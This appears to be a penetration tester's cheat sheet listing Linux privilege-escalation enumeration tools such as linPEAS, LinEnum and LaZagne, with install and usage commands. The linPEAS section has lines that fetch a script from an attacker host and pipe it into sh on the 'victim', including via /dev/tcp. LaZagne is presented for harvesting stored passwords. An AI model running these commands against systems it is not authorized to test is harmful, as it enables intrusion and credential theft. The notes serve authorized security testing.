Automated

If wget doesn’t work :

cat > les.sh
This file was created using cat (^._.^)
# Hit Ctrl+D to exit!

linux-exploit-suggester

https://github.com/mzet-/linux-exploit-suggester

# install
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh
 
# usage
./les.sh

linux-smart-enumeration

https://github.com/diego-treitos/linux-smart-enumeration

# install
wget "https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh" -O lse.sh
curl "https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh" -o lse.sh
 
# usage
# shows interesting information that should help you to privesc
./lse.sh -l1 
# dump all the information it gathers about the system
./lse.sh -l2 

linPEAS

https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS

# install
wget "https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh" -O linpeas.sh
 
# COMMANDS
# Local network
# On the Host
sudo python -m SimpleHTTPServer 80 
 
# On the Victim
curl $ip/linpeas.sh | sh 
 
# Without curl
# On the Host
sudo nc -q 5 -lvnp 80 < linpeas.sh 
 
# On the Victim
cat < /dev/tcp/10.10.10.10/80 | sh 
 
# USAGE
#all checks - deeper system enumeration, but it takes longer to complete.
./linpeas.sh -a 
# superfast & stealth - This will bypass some time consuming checks. In stealth mode Nothing will be written to the disk.
./linpeas.sh -s
 #Password - Pass a password that will be used with sudo -l and bruteforcing other users
./linpeas.sh -P

linuxprivchecker

https://github.com/sleventyeleven/linuxprivchecker

# INSTALL
wget https://raw.githubusercontent.com/sleventyeleven/linuxprivchecker/master/linuxprivchecker.py
 
# python 2.6/2.7
python linuxprivchecker.py -w -o linuxprivchecker.log
 
# python 3.x
pip install linuxprivchecker
 
# USAGE
linuxprivchecker -w -o linuxprivchecker.log
# or 
python3 -m linuxprivchecker -w -o linuxprivchecker.log

LinEnum

https://github.com/rebootuser/LinEnum

# install
git clone https://github.com/rebootuser/LinEnum.git
 
# usage
./LinEnum.sh -s -k keyword -r report -e /tmp/ -t

LaZagne

https://github.com/AlessandroZ/LaZagne

Retrieve lots of passwords stored on a local computer.

# install
git clone https://github.com/AlessandroZ/LaZagne.git
cd LaZagne
pip install -r requirements.txt
cd Linux/
 
# usage
python laZagne.py

unix-privesc-check

https://pentestmonkey.net/tools/unix-privesc-check/unix-privesc-check-1.4.tar.gz

chmod +x unix-privesc-check
./unix-privesc-check > checks.txt

pwncat

https://github.com/calebstewart/pwncat

Usage

# enumeration
run enumerate # to enumerate the whole server
run enumerate.file.caps # to enumerate linux capabilities
run enumerate.file.suid # to enumerate suid files